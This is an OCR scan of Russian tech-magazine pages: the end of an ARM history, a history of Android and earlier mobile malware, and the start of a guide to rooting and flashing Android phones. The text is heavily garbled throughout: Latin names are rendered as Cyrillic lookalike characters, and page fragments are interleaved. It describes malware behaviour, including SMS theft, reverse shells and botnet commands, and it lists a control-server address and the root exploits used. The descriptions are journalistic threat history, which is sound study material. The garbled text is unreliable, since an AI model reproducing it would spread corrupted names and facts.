развитие мобильных устройств. Арре Мемщоп 
и наладонники Роске РС были лишь предисло- 
вием ктому, что случилось после выпуска !РПопе 
В 2007 году и 1Раа — в 2010-м. Энергоемкость 
архитектуры Е$С оказалась ключом к строению 
портативных устройств, и, сколько Ее ни пы- 
тается соревноваться с АВМ на этом попри- 
ще, сделать конкурентоспособный процессор 
для планшетов и смартфонов на основе х8б6 пока 
что не удалось. 

Благодаря ААМ архитектура ЕС наконец 
получила заслуженную славу, но на этом история 
вовсе не заканчивается. Специалисты с интере- 
сом следят за ростом популярности многопро- 
цессорных серверных решений на основе ААВМ 
(их, кпримеру, активно внедряют в дата-центрах 
Расебоок) и обсуждают недавнее появление 
64-разрядного ААМ\УёВ. Так что будущее ААМ 
видится даже более захватывающим, чем про- 
шлое. Пока что это еще не «британский 1ВМ», 
о котором так мечтал Хаузер, но процветающая 
фирма, вполне себе бодро идущая к этому зва- 
нию. = 
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История мобильного вирусописательства на примере Апаго4 


Первый экспериментальный образец полноценного трояна для Апагоа был представлен летом 
2010 года на конференции ГЕЕ СОМ 18. С тех пор прошло уже три года, и за это время количе- 
ство вирусов для мобильной ОС от Фоое выросло в тысячи раз, а Сбооде успела придумать 
десятки различных методов противостояния угрозам. В этой статье мы детально исследуем 
мир вредоносов для Апаго и проследим противостояние поискового гиганта и хакеров. 


ДОНАШЕЙ ЭРЫ, ИЛИ КАК НАПИСАТЬ ВИРУС 

ЗА 15 МИНУТ 

Первые попытки создать вредоносный софт для Апаго и до- 
казать несостоятельность гугловской мобильной платформы 
с точки зрения безопасности начались с публикации первых 
предварительных версий Апагоа $ОК в 2007 году. Молодые 
студенты писали софт, который использовал стандартную 
функциональность смартфона для чтения ЗМ$`ок, а «исследо- 
вательские» команды, вроде ВШИ27 Рогсе Маззада, демонстри- 
ровали аж «30 векторов атак на Апаго!а», показывая, как можно 
использовать стандартные АРГАпагоа во вредоносных целях. 

Это было время игрушек, которые нельзя было назвать 
ни настоящим вредоносным ПО, ни тем более вирусами. То тут, 
то там появлялись приложения, вроде Моше $ру от Вейта-Х 
Зфиаю$, которые позволяли удаленно читать текстовые сооб- 
щения, историю звонков, просматривать фотографии, видео, 
определять координаты смартфона. Встречались и различные 
поддельные приложения, такие как обнаруженный в маркете 
в январе 2010 года неофициальный клиент для различных бан- 
ков, который ни с чем не соединялся, а просто уводил номера 
кредитных карт, введенных самим пользователем. 

Более-менее настоящий троян был реализован только 
В 2010 году секьюрити-компанией Тгиз\мауе, которая про- 
демонстрировала его на конференции ОГЕЁЕ СОМ 18. Впрочем, 
Америки они не открыли; троян был всего лишь стандартным 
модулем ядра Шпих, который перехватывал системные вызовы 
иг1%е(), геаа(), ореп() и с1о$е(), а также создавал реверсив- 
ный шелл по звонку с определенного номера. Вся эта функ- 
циональность позволяла подключиться к смартфону удаленно 
и скрытно использовать его возможности в своих целях, в том 
числе читать конфиденциальную информацию. 

Для установки руткита требовался физический доступ 
к устройству, годф{-права и смартфон НТС 1едепа (модуль был 
совместим только с его ядром), поэтому ни о каком практиче- 
ском применении руткита речи не шло. Ргоо? от сопсерф, кото- 
рый доказал только то, что ядро Шпих и в смартфоне остается 
ядром Ипих. 

Настоящий троян «в дикой природе» (не в маркете) был най- 
ден только в августе 2010 года. Правда, это был совсем не тот 
тип трояна, о котором принято писать в нашем журнале, а всего 
лишь ЗМ$-троян, то есть, по сути, обычное приложение, кото- 
рое шлет 5М$ на платные номера без ведома юзера. Игрушка, 
которую хороший программист напишет за полчаса, но очень 
опасная, попади она к обычному юзеру. 

Троян, получивший имя Тго]ап-5М$.АпагоаО$.РакеР!ауег.а, 
прикидывался видеоплеером под незамысловатым назва- 
нием Моме Рауег и с иконкой стандартного проигрывателя 
из МИ/паом$. Приложение требовало права доступа к карте па- 


мяти, отправке 5М$ и получению данных о смартфоне, о чем 
система сообщала перед его установкой. Если все это не сму- 
щало пользователя и он соглашался с установкой и запускал 
приложение, оно повисало в фоне и начинало отправку $М$ 
на номера 3353 и 3354, каждая из которых обходилась в пять 
долларов. Номера эти, кстати, действовали только на террито- 
рии России, так что нетрудно догадаться о корнях автора данно- 
го «произведения». 

В октябре был обнаружен другой тип 5М$-трояна. На этот 
раз зловред использовал смартфон не для опустошения ко- 
шелька жертвы, а для кражи его конфиденциальных данных. 
После установки и запуска троян уходил в фон и пересылал 
все входящие $М$ на другой номер. В результате злоумыш- 
ленник мог не только завладеть различной конфиденциальной 
информацией пользователя, но и обойти системы двухэтапной 
аутентификации, которые для входа требуют не только логин 
и пароль, но и одноразовый код, отправляемый на номер мо- 
бильного телефона. 

Интересно, что номер телефона злоумышленника не был 
жестко вбит в код трояна, а конфигурировался удаленно. Чтобы 
его изменить, требовалось отправить на номер жертвы особым 
образом оформленную $М$, которая содержала номер теле- 
фона и пароль. Пароль можно было изменить с помощью дру- 
гой ЗМ$, по умолчанию использовалась комбинация гед йе. 


СЕММТИ ВСЕ-ВСЕ-ВСЕ 
Первый по-настоящему профессионально написанный и об- 
ладающий защитой от анализа вредонос для Апаго был об- 
наружен только в декабре 2010 года компанией 1оокош. Тро- 
ян, получивший имя Сештит!, качественно отличался от всего, 
что было написано ранее, и обладал следующими уникальными 
характеристиками: 

. Распространение в составе легитимного ПО. В отличие 

от всех остальных зловредов, которые только прикидыва- 
лись настоящими программами и играми, Сештит! на са- 
мом деле внедрялся в реально существующие игры. В раз- 
ное время троян был найден в составе таких приложений, 
как Мопкеу уитр 2, Ргезаегт \егзи$ Айепз$, Спу Оеепзе апа 
Вазеба! Зирегзаг$ 2010, разбросанных по местным марке- 
там Китая и различным {отет-трекерам. Функциональность 
оригинального приложения полностью сохранялась, поэто- 
му пользователь даже не догадывался о заражении смарт- 
фона. 
Двойная защита от анализа. Код трояна был пропущен че- 
рез обфускатор, что затрудняло его анализ, а все комму- 
никации с удаленным сервером шифровались (справед- 
ливости ради стоит сказать, что использовался ущербный 
алгоритм ОЕ$ с ключом 12345678). 
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. Возможность использования для организации ботнета. 
В коде Сетит! было найдено более 20 управляющих команд, 
которые позволяли выполнять такие операции, как установ- 
ка и удаление приложений (правда, на это требовалось раз- 
решение пользователя), получение списка всех установлен- 
ных программ или запуск приложений. 


В целом Сештит!г действовал по следующему алгоритму. 
После запуска зараженного приложения создавался фоновый 
сервис, который собирал персональные данные: координаты 
устройства, номера МЕ! и 1М$1. Затем с интервалом в одну ми- 
нуту он пытался связаться с одним из десяти удаленных сер- 
веров (мммммммаТи.сот, мили. идаоге.сот, ммм 1А.сот и дру- 
гими), куда передавалась вся собранная информация и где 
собирались команды для удаленного исполнения. 

СешитЕ стал родоначальником полнофункциональных троя- 
нов для Апагога, и после его первого обнаружения на просторах 
интернета стали все чаще появляться зловреды с аналогичной 
или похожей функциональностью. Вскоре была найдена мо- 
дификация Сетит! под названием АОРО, троян Апагоа.Р/арр$ 
и множество других. Все они распространялись через различ- 
ные сайты, {тотещ-трекеры, китайские неофициальные мага- 
зины, поэтому защититься от них можно было, просто не уста- 
навливая приложения из неизвестных источников. Однако все 
изменилось, когда был обнаружен троян ОгоАОгеат, распро- 
странявшийся в составе более чем 50 приложений, опублико- 
ванных в официальном Апагоа МагкЕт. 


ОВО!РОВЕАМ И НАЧАЛО БОРЬБЫ ЗАЧИСТОТУ 
МАРКЕТА 

В марте 2011 года пользователь Шотроо сообщил на гедай, 
что в маркете Апагоа обнаружено нескольких десятков вре- 
доносных приложений, опубликованных человеком с ником 
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Все, что выводит Зирег!еап на экран 


Муоитет. Несмотря на заурядность самого трояна, а также 
уже известный способ распространения, основанный на вне- 
дрении кода в легитимное приложение, факт наличия малвари 
в маркете, а также предположения о том, что она использует 
эксплойт гадеадат$ИПесаде для получения прав го { на устрой- 
стве, быстро подогрели интерес к новости пользователей и со- 
трудников различных секьюрити-компаний. За несколько дней 
начальный список из двух десятков приложений расширился 
до 56, а среди публиковавших его людей (или ботов, кто знает) 
обнаружились Ктдта!2010 и ме20090202. 

Сам по себе ОгоаОгеат по функциональности был очень 
похож на упрощенный Сеттт, но не был его вариацией. Онтак- 
же собирал информацию о смартфоне, отправлялее наудален- 
ный сервер (ПИр://184.105.245.17:8080/ОМЗегмег/оМЗеме) 
и получал в ответ управляющие команды. Плюс ко всему онтак- 
же содержал в себе другое приложение, спрятанное в каталоге 
а5з&$/заще.а6 внутри АРК и устанавливаемое в систему под 
именем ОБомпюааРгомаегМападег.арк. Очевидно, это была за- 
щита от удаления. 

В сумме зараженные приложения успели установить от 50 
до 200 тысяч пользователей, пока команда безопасности 
Сооде не отреагировала на сообщение и не удалила из мар- 
кета все найденные копии зловреда и аккаунты выложивших 
их пользователей. В дополнение в маркете также появилось 
приложение Апагоа Магке Зесищу Тод, с помощью которо- 
го пользователь мог очистить смартфон от заразы. Но и здесь 
не обошлось без конфуза. Буквально через два дня после это- 
го Зутатщес обнаружила на просторах интернета зараженную 
версию этого приложения, которая содержала в себе уже дру- 
гой троян, названный впоследствии Гаке10086 за выборочную 
блокировку 5М$ с номера 10086. 

Факт проникновения малвари в Апагоа Магке (а после 
ОгоаОгеат в маркете было обнаружено еще несколько ви- 
русов) заставил Соое серьезно задуматься над безопас- 
ностью своего репозитория приложений, а так как вручную 
они ничего делать не привыкли, то в результате в начале 2012 
года выкатили сервис Воипсег, который проверял приложения 
на безопасность с помощью запуска в виртуальной машине. 
Задача Воипсег состояла в том, чтобы производить много- 
кратный запуск софтины, симулировать работу реального 
пользователя с приложением и анализировать состояние си- 
стемы до и после работы с приложением. Если никаких стран- 
ных и подозрительных действий софтина себе не позволяла, 
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то она пропускалась в маркет, в противном случае публикация 
блокировалась. 

Если верить Соое, то сразу после запуска Воипсег со- 
кратил количество вредоносов в маркете на 40% (как они это 
подсчитали, остается загадкой). Однако позднее выяснилось, 
что его можно легко обойти, просто проанализировав некото- 
рые характеристики системы, такие как етай-адрес владельца 
«смартфона», версию ОС и так далее, а затем создав прило- 
жение, которое при их обнаружении будет действовать абсо- 
лютно законно и делать грязную работу только на настоящем 
смартфоне. Скорее всего, Сооде уже разработала схему про- 
тиводействия обнаружению Воипсег (например, с помощью 
генерации уникальных виртуальных окружений для каждого 
приложения). 


2ЕЦ$-М-ТНЕ-МОВШЕ 

Пять лет назад по компам пользователей начал свое победо- 
носное шествие троян под названием 2еи$. Благодаря изо- 
щренному дизайну и продвинутым техникам маскировки, де- 
лавшим его обнаружение невероятно трудной задачей, он смог 
распространиться на миллионы машин по всему миру и создать 
один из самых крупных ботнетов в истории; только в США было 
зафиксировано более трех с половиной миллионов случаев за- 
ражения. 

Основная задача Геи$ состояла в организации атаки типа 
тап-т-{Пе-бгом/зег, то есть использования техник кейлоггин- 
га и формграббинга для перехвата частной пользовательской 
информации и ее отправки на удаленные серверы. За время 
своей работы Геи$ смог утащить сотни тысяч логинов и паро- 
лей от популярных сервисов (Гасероок, Уапоо!, 15, тегогЕОС, 
Зопсо, Мейод) и, конечно же, множества онлайн-банков. 

Разработчик Геи$ быстро отреагировал на появление си- 
стем двухфакторной аутентификации и в 2010 году выпустил 
для ут ап и ВаскВегту приложения, задача которых состояла 
в перехвате аутентификационных 5М$-сообщений с одноразо- 
выми кодами авторизации и их последующей отправке на все 
те же удаленные серверы. В середине 2012 года аналогичное 
приложение появилось и для Апагов. 

Первая его версия была очень примитивна и представляла 
собой якобы секьюрити-приложение, которое при запуске вы- 
водит код верификации и закрывается. В результате в фоне 
повисает сервисный процесс, который занимается перехватом 
5М$ и их отправкой на удаленный сервер. Последующие вер- 
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сии Геи$ для Апаго@ обзавелись также системой удаленного 
управления с помощью сообщений с определенного номера, 
однако никаких продвинутых приемов маскировки или распро- 
странения вирус не использовал и в этот раз. 

Тем не менее мобильная версия Геи$ все-таки смогла наде- 
лать много шума в СМИ, но, как можно видеть, троян был силь- 
но переоценен. 


ПЕРВЫЙ |ВС-БОТ 
В середине января 2012 года сотрудники «Лаборатории Ка- 
сперского» сообщили, что обнаружен первый в истории Апагоа 
ВС-бот. Приложение распространялось в виде установочно- 
го АРК-файла размером чуть больше 5 Мб и выдавало себя 
за игру Маааепт МЕРЕ 12. Интересное отличие этого трояна 
от других было в том, что, по сути, вся его логика работы заклю- 
чалась в нативных приложениях Ипих, которые никак не свети- 
лись в окне стандартного диспетчера задач Апагоа и к тому же 
использовали локальный эксплойт для получения прав гос{. 

Во время запуска приложение создавало каталог /дафа/ 
Дафа/сот.апаго1а .Бо{/#1ез, в котором размещало три фай- 
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ла: ПеадегО1 .рпд, ТосдегО1.рпд, БогаегО1.рпд, а затем ставило 
на них бит исполнения и запускало первый файл — эксплойт 
Стоегогеак для получения прав гос{ на устройстве. Если была 
установлена уже рутованная прошивка, приложение пыталось 
получить права гоо{ штатными средствами, в результате чего 
у пользователя запрашивалось предоставление повышенных 
привилегий (тот случай, когда рутованный смартфон безопас- 
нее залоченного). 

В случае успешного получения прав гоо{ любым из двух 
способов запускался второй файл, в котором хранился ЗМ$- 
троян — модификация известного трояна Гопсу 5$М$. Троян 
определял принадлежность $!М-карты стране и начинал от- 
правку сообщений на короткий платный номер, блокируя все 
ответные сообщения. Следующим запускался файл Богаего1. 
рпд, в котором был код !ВС-бота. Он подключался к!АС-серверу 
с |Р-адресом 199.68.*.* и регистрировался на канале #апаго$ 
под случайным ником. Все сообщения, отправленные боту, вы- 
полнялись в консоли как обычные Ипих-команды. 

Согласно заявлению сотрудников «Лаборатории Касперско- 
го», это было первое приложение такого класса для Апаго. Од- 
нако, по их мнению, опасность его была невелика, так как рас- 
пространялся он только через серые маркеты, а эксплойт 
работал только в ранних версиях Апагога 2.3. 


ПЕРВЫЙ ПОЛИМОРФНЫЙ ТРОЯН 

В феврале 2012-го компания Зутащес сообщила, что обна- 
ружила первый полиморфный троян для платформы Апагов, 
который на тот момент не мог быть найден ни одним мобиль- 
ным антивирусом, кроме ее собственного (сюрприз). Троян, 
названный Апагоа.Ортаке, распространялся через различные 
веб-сайты, находившиеся преимущественно на территории 
России и стран СНГ, в виде бесплатной версии популярного 
приложения или игры. 

Полиморфным он был только условно, так как изменение 
трояна происходило на стороне сервера. При каждой новой за- 
грузке файла содержимое АРК-файла изменялось с помощью 
различных методов, таких как модификация файлов данных, 
включение в пакет приложения «мусорных файлов», а также 
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изменение имен файлов. Все это затрудняло обнаружение 
мобильными антивирусами, которые в то время использовали 
примитивные техники идентификации, типа сверки контроль- 
ных сумм и проверки на наличие специфических файлов в па- 
кете. 

После попадания на смартфон жертвы и запуска троян 
извлекал из файла ге5/гам/аафа.а6 (который существовал 
в любой версии трояна) список операторов связи и платных 
коротких номеров и начинал отправку 5М$. В дополнение тро- 
ян открывал в браузере веб-страницу, содержащую ссылки 
на другое вредоносное ПО. Интересно, что сообщения также 
изменялись при каждой новой мутации трояна, в результате 
чего было невозможно блокировать определенные типы со- 
общений на стороне оператора. 


ВИРУС-МАТРЕШКА 

Неделей раньше, а именно 1 февраля 2012 года на сайте 
зесиге!>1.сот Виктор Чебушев опубликовал заметку, посвя- 
щенную обнаружению нового типа вируса, распространяемого 
через магазин Сооде Рау. Вирус маскировался под приложе- 
ние бирегаеап, способное, по словам разработчиков, очистить 
память устройства и таким образом поднять производитель- 
ность смартфона или планшета. На тот момент приложение 
имело уже от 1000 до 5000 установок и хороший рейтинг в 4,5 
звезды. 

Как выяснилось, Зирегсеап действительно выполнял очист- 
ку памяти, но делал это простым перезапуском всех фоновых 
приложений с помощью всего пяти строк на языке чуама. На этой 
«сложной» задаче полезное действие приложения заканчива- 
лось, а самое интересное начиналось дальше. Анализируя код, 
сотрудник «Лаборатории Касперского» обнаружил, что при за- 
пуске приложение соединялось с удаленным сервером и за- 
гружало на карту памяти три файла: ащогип.иЪ, Тоаегасо 
и з\спо${5.ехе. 

Первые два автоматически превращали подключаемый 
к 95В-порту компа смартфон в самозагружаемую флешку, с ко- 
торой запускался файл $\спо${$.ехе. Сам $успо$5$.ехе на по- 
верку оказался бэкдором Васкаоог.МУ.Ззис!.а, который слу- 
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шает микрофон компьютера и отправляет все полученные с его 
помощью данные на удаленный сервер. 

Отличительной чертой трояна был также самый внушитель- 
ный на тот момент набор функциональности из всех мобильных 
зловредов для Апагоа. По команде от оператора он мог от- 
правлять сообщения без ведома пользователя, включать и вы- 
ключать \\/-Ет, собирать информацию об устройстве, открывать 
произвольные ссылки в браузере, отправлять на удаленный 
сервер содержимое $0)-карты, 5М$-переписку и выполнять 
многие другие операции. 


ОЧЕРЕДНОЙ ОТВЕТ СООСЕЕ, ИЛИ ПРИНУДИТЕЛЬНАЯ 
ПРОВЕРКА ВСЕХ ПРИЛОЖЕНИИ 

К концу 2012 года ситуация с зловредами для Апаго!а стала 
уже настолько накаленной, что Сооде решила пойти на оче- 
редной кардинальный шаг. В сентябре без лишней огласки был 
приобретен сервис онлайн-проверки приложений на вирусы 
\МгизТота|, а 29 октября выпущена версия Апаго 4.2, одним 
из новшеств которой стала автоматическая проверка любого 
устанавливаемого не через Сооде Р!ау приложения на вирусы 
через удаленный сервис. 

Трудно сказать, использовала ли Соое купленный 
\МгиТота! для этой задачи, или у них есть собственный сервис 
проверки, однако не нужно быть сотрудником @оод(е, чтобы по- 
нять, что \МгизТо{а! так или иначе был использован для защиты 
Апагога от вирусов. 


САМЫЙ ПРОДВИНУТЫЙ ТРОЯН 

В июне этого года сотрудники «Лаборатории Касперского» об- 
наружили наиболее продвинутый в техническом плане троян 
для Апаго из всех, что встречались до этого. Троян получил 
имя Васкаоог.АпагоаО$.ОБад.а. Это было независимое при- 
ложение, не внедряемое в легитимный софт и, судя по всему, 
распространяемое под видом известных приложений. 

После соглашения пользователя с длинным списком полно- 
мочий, установки и запуска он запрашивал права администра- 
тора устройства (речь идет не о гос\, а о собственной системе 
безопасности Апагоа), которые были нужны только для двух 
вещей: самостоятельной блокировки экрана и защиты от уда- 
ления. Последнее троян делал особенно изысканно. Исполь- 
зуя ранее неизвестный баг в Апагою, он удалял себя из списка 
приложений с полномочиями администратора, из-за чего его 
невозможно было лишить этих прав и, как следствие, удалить. 


А КАК ЖЕ ДРУГИЕ МОБИЛЬНЫЕ 0С? 


Далее троян проверял в системе наличие прав гос 
и при следующем подключении к \\/-Н-сети отправлял инфор- 
мацию об устройстве на удаленный сервер. Информация была 
типична для такого рода приложений и содержала в себе номер 
телефона, 1МЕ!, МАС-адреса и подобную информацию. В ответ 
он получал список команд для исполнения и заносил их в базу 
данных с пометкой о времени исполнения. Удаленными коман- 
дами могли быть: проверка баланса, отправка сообщений, 
переход в режим проксирования трафика, скачивание и уста- 
новка приложений, отправка файлов по Вию, открытие 
шелла и другие. Плюс ко всему при каждом подключении к дру- 
гому устройству по синему зубу он копировал сам себя на это 
устройство. 

При попытке анализа кода трояна обнаружилось использо- 
вание множества техник защиты от анализа. Во-первых, троян 
эксплуатировал неизвестный ранее баг в утилите аех2]аг, из-за 
которого декомпиляция кода трояна происходила некоррек- 
тно. Во-вторых, троян использовал еще один неизвестный баг 
в Апагоа, позволяющий создать файл Мапйе$.хт!|, в котором 
содержится метаинформация о приложении, таким образом, 
чтобы он противоречил стандартам СооЧеЕ, но при этом коррек- 
тно обрабатывался при запуске приложения. Из-за этого мно- 
гие инструменты анализа просто не срабатывали. 

Если же удавалось распаковать и декомпилировать код тро- 
яна, обойдя эти ограничения, то дальше приходилось иметь 
дело с многоуровневой системой шифрования, которая защи- 
щала от анализа все текстовые данные, а также имена методов 
(они тоже были строками и вызывались посредством рефлек- 
сии). Интересно, что ключом для первого слоя шифрования 
была строка с главной страницы Тасебоок.сот, из-за чего ра- 
боту трояна невозможно было проанализировать в «стерильной 
комнате», без подключения к интернету (хотя ограничение, ко- 
нечно, можно обойти с помощью прокси). 


ВЫВОДЫ 

Количество вирусов для Апаго!А сегодня исчисляется тысяча- 
ми, и некоторые из них действительно представляют интерес 
для исследователя как образцы хорошего программирования 
и знания архитектуры Апагога. Вот только бояться их не стоит. 
Автор данной статьи уже четвертый год использует смартфоны 
на Апаго без всяких антивирусов и ни разу не поймал на них 
заразу. Главное — читать полномочия приложений и ставить их 
только из маркета. и 


бт 


АА АА 


Доклад сконферен- 

ции ОЕРСОМ 18, по- 

священный первому 

серьезному руткиту 
для Апагога: 


То самое сообщение 
нагедай об обна- 
ружении трояна 
ОгоаОгеат: 


Настоящая история мобильных вирусов нача- 
лась задолго до появления Апагоа — в те вре- 
мена, когда на рынке господствовали ЗутЫМап 
и М/таом/$ СЕ. Еще в 2004 году хакерская ко- 
манда 29А продемонстрировала пример червя 
для ЗутЫапт 5епез$ 60, названного впоследствии 
Саш (\М/огт.ЗутЬО$.Саыг). Червь распростра- 
нялся через Виаос{И и не совершал никаких 
зловредных действий, только демонстрировал 
сообщение «Сапе» после включения смарт- 
фона. Участники 29А разослали вирус ведущим 
антивирусным компаниям как пример, а затем 
опубликовали его исходный код, из-за чего впо- 
следствии появилось несколько модификаций 
червя, на этот раз найденных «в дикой природе». 

Затем был обнаружен первый вирус для си- 
стем на базе \Мтао\м$ СЕ под названием \Мти$. 
\ММпСЕ.Оц{$. Он поражал РоскаРС 2000, Роска“РС 
2002, РоскаРС 2003, не умел распространяться 
через Виеос или ММ5$, но инфицировал все 
найденные приложения на самом устройстве. 
Как и Саб, он был детищем 29А и также был соз- 
дан для демонстрации возможности существова- 
ния подобного рода зловрелдов. 


Спустя месяц для МИпаом/5 СЕ был обнару- 
жен первый бэкдор: Васкаоог/\МтСЕ.Вгадог. 
После запуска зловред прописывался в автоза- 
грузку, а затем открывал сетевой порт и ожидал 
удаленные подключения. Бэкдор поддерживал 
такие команды, как получение списка файлов 
на устройстве, загрузка файла, показ $ЗМ$-сооб- 
щений, получение файла с устройства и выпол- 
нение определенной команды. 

Практически сразу после Вгадог был найден 
и первый $М$-троян, в этот раз для Зут ап. 
Он распространялся в составе простой игры 
МозаиЦКо$, в честь которой и получил свое имя — 
Тго]ап.ЗутбО$.Мозаий.а. После запуска он на- 
чинал рассылку сообщений на премиум-номера. 
Работоспособность игры при этом полностью 
сохранялась, а ее титульный экран был украшен 
сообщением о том, что игра была крякнута неким 
ЗООООМ ВМ ГОАПЕВН. 

Впоследствии количество известных вирусов 
начало стремительно возрастать, и многие из них 
использовали многочисленные уязвимости 
в зутФап. Например, Тго]ап.ЗутбО$.Еоскп\, 
получивший известность в России как Со\упо, 


использовал некорректную проверку исполня- 
емых файлов, чтобы блокировать работу всей 
ОС. Тгоап.ЗутбЬО$.Рота! заменял системные 
шрифты на модифицированные версии, из-за 
чего ОС также отказывалась загружаться. Тго]ап. 
ЗутЬО$.Ватрю и Тго]ап.ЗутбО$.НоБе подме- 
няли системные приложения, а Тго]ап.ЗутЬ 05. 
Огеуег был способен блокировать работу антиви- 
русных приложений. 

После того как на сцене появилась 105$, не- 
которые вирусописатели попытались переклю- 
читься на нее. Однако из-за параноидальной 
закрытости АР! ОС и невозможности установить 
приложения из сторонних источников эпиде- 
мии не произошло. Немногочисленные вирусы 
были ориентированы на взломанные устройства 
и в основном выводили на экран различные ре- 
кламные и фишинговые сообщения. Наиболее 
примечательным стало разве что появление тро- 
яна в самом Арр ЗЧоге. Приложение под назва- 
нием Ета апа сай, обладая функционалом \МоР- 
клиента, при этом совершало такие действия, 
как копирование контактов на удаленный сервер 
и рассылка спама (на русском языке, кстати). 
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Прошиваем, обновляем и тюнингуем 
смартфон, не покидая Апаго4 


Несколько лет назад такие операции, как рутинг, прошивка и тюнинг Апагоа-смартфона, требо- 
вали достаточно глубоких знаний, специальных инструментов, совместимых только с настоль- 
ной М/паом/$, и массу терпения. Сегодня все стало намного проще и все эти действия можно 
выполнить с помощью специального софта, доступного прямо в Сооде Рау. 


ВВЕДЕНИЕ 

Обычно установка альтернативной прошивки на девственно чи- 
стый смартфон выглядит примерно так: сначала ты находишь 
в Сооде информацию по рутингу своей модели смартфона, 
затем обзаводишься необходимыми инструментами (Апагоа 
ОК, аа, Та$бос{, скрипты), подключаешь смартфон к компу 
и пытаешься как можно точнее выполнить инструкции. Если все 
удалось, ты получаешь гос] и, в некоторых случаях, в довесок 
кастомную консоль восстановления. 

Далее следует установить прошивку. Для этого ты вновь 
погружаешься в интернет и, спустя полчаса хождения по фору- 
мам и чтения информации о совместимости, находишь и ска- 
чиваешь 7р-архив с прошивкой. Снова подключаешь смартфон 
ккомпу и скидываешь на него прошивку. Затем ты выключаешь 
смартфон, включаешь его, зажав кнопки уменьшения гром- 
кости и включения, и получаешь доступ к консоли восстанов- 
ления. Пять минут походив по меню с помощью клавиш гром- 
кости, ты находишь свою прошивку на карте памяти и даешь 
команду на установку. 

После окончания установки ты перезагружаешь смартфон 
и молишься, чтобы все получилось. Когда на экране появляется 
рабочий стол, ты с облегчением выдыхаешь и тут же вспомина- 
ешь, что забыл скачать и установить приложения СоодЕе и ядро. 
Что ж, для этого ты еще полчаса проводишь в интернете, нахо- 
дишь искомые 7р’ы, скидываешь их на карту памяти, дальше 
консоль восстановления, тыканье по меню, ожидание со скре- 
щенными пальцами, и вот оно, рабочий стол... блин, надо было 
устанавливать другую прошивку... 

Знакомая картина? Если да, то эта статья для тебя. Из нее 
ты узнаешь, как проделать все то же самое за десять минут, 
подключив смартфон к компу только один раз на две минуты. 


ЧТОТЫ ХОЧЕШЬ ИЧТОТЫ ПОЛУЧИШЬ? 

Итак, предположим, что ты держишь в руках совершенно но- 
вый смартфон. Твоя задача — установить на него СуаподептМоа 
(как вариант — АОКР РагапоаАпаго или популярный 
Зире’\/азуаАпагоаМоаР!из) и ядро Ттапсо.Кегпае.. И тот и другой 
распространяются в прошиваемых через консоль восстанов- 
ления тр-файлах. Однако обычная консоль их не примет из-за 
кривой цифровой подписи («не производителя это подпись, 


прощайте»). Поэтому тебе нужна кастомная консоль восстанов- 
ления, которая не обращает внимания на цифровые подписи. 
Это может быть Соск\могкКМоча или Т\М/ВР. 

Но! Чтобы установить кастомную консоль восстановления, 
нужны права записи во внутреннюю память смартфона, то есть 
нужен гоо{. А гос{ в «не Мехиз$» устройствах всегда получают 
с помощью взлома защиты Апагога. Итого в целом картина дей- Евгений Зобнин 
ствий выглядит так: получение гоот —› установка консоли вос- ехесьй.ги 
становления —> прошивка СуаподепМоч — прошивка приложе- 
ний СооЧе — прошивка ядра ->› перезагрузка -+› радость. Давай 
посмотрим, как все это сделать. 
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СоскиугогкКМод Весомегу 


Восстановление информации 


Ведущие имвемеры 


ВООТ 

Перво-наперво нам нужен гос{. Сразу скажу, что это единствен- 

ная задача, для решения которой придется подключить смарт- 

фон к компу. Здесь уж ничего не поделаешь, система безопас- 
ности Апаго@ не позволит сделать это Апагоа-приложению. 

С другой стороны, плеваться тоже не стоит, так как все делается 

очень быстро и безболезненно. Общий алгоритм действий вы- 

глядит так: 

1. Заходим на телефоне в «Настройки > О телефоне» и много 
раз подряд тыкаем в «Номер сборки» до тех пор, пока не по- 
явится сообщение «Теперь вы разработчик!›, далее идем 
В «Настройки -—» Для разработчиков» и ставим галочку «От- 
ладка по УЗВ» (если установлен Апаго@ версии ниже 4.2, 
можно сразу идти в раздел для разработчиков). 

2. Подключаем смартфон к компу с помощью ЧУЗВ-кабеля, 

на телефоне выбираем «Медиаустройство» (МТР) либо «Ка- 

мера» (РТР) и ждем, когда установятся драйверы. 

Качаем приложение !Вос{ (доо.а/СмНИ\) и запускаем. 

Нажимаем «Проверить подключение...». 

Нажимаем «Установить РООТ» и делаем, что пишет про- 

грамма. 


ОТ 09 


По заявлению украинских разработчиков, Робот дей- 
ствует в отношении любого 
смартфона под управлением 
Апаго 2.3—4.2.2, а не только 
устройств от Ниамет, как мож- 
но было подумать, скачав и за- 
пустив приложение. После за- 
вершения работы и нескольких 
перезагрузок на смартфоне 


2. Установить ВООТ 


должно появиться приложение 
Зирег ег и, конечно же, гос{- 
- доступ, который откроет нам 


3. Удаление КООТ прав 


путь для установки рекавери 
и прошивок. 


Коды разблокировки сети 


УСТАНОВКА ВЕСОУЕВУ 


Установить кастомную консоль 
| восстановления между тем 
очень просто. Для этого в мар- 
кете есть куча приложений, 
но я бы рекомендовал исполь- 
зовать Весо\уегу-Тоо!$, ВОМ 
Мападег или ТМУ/АР Мападег. 
Первая предназначена ис- 
ключительно для установки 
. рекавери и, по сути, состо- 


Низами елке, РРАЛА 


ТМ/АР Мападег: простой и удобный способ управления ТМ/ВР Весоуегу 


ит всего из двух кнопок: Назй СосКмогктоа Весоуегу и На$п 
ТМ/ВР Весоуегу. После нажатия одной из них будет установле- 
на та или иная консоль восстановления. В принципе, неважно, 
какую из них устанавливать, отличие разве что в том, что ТМУАР 
удобнее управлять пальцем, но и эта функция нам безразлич- 
на — самостоятельно рыться в их настройках мы не будем, а по- 
ложимся на специальный софт. 

По идее, Весоуегу-Тоо|$ должна сама определить модель 
смартфона и скачать правильный архив с консолью, однако 
этот механизм срабатывает не всегда, да и база данных не- 
полная. Поэтому как запасной вариант можно использовать 
ВОМ Мападег, предназначенный исключительно для установки 
СоскмогкКМоча, но зато включающий в себя исчерпывающую 
базу устройств. Опять же все, что нужно сделать, — это нажать 
на кнопку Весоуегу Заир ->› СоскмогкМоа Весоуегу, подтвер- 
дить модель телефона и дождаться окончания установки. 

Если же и этот метод не сработал, то стоит обратить внима- 
ние на модель своего смартфона и убедиться, не китайская ли 
это поделка. Само собой разумеется, супердешевые китайские 
телефоны нельзя прошить таким образом. Никто их в базу вно- 
сить не будет, а заниматься поддержкой тем более. Поэтому 
в отношении китайцев придется применять старый дедовский 
способ ручной установки (да и то тебе сильно повезет, если 
на него вообще что-то будет портировано). 


УСТАНОВКАПРОШИВКИ 

Теперь, когда смартфон оснащен кастомной консолью вос- 
становления, он готов принять любую доступную для данной 
модели прошивку и проглотить ее, не поперхнувшись. Са- 
мостоятельно искать прошивки мы, конечно же, не станем. 
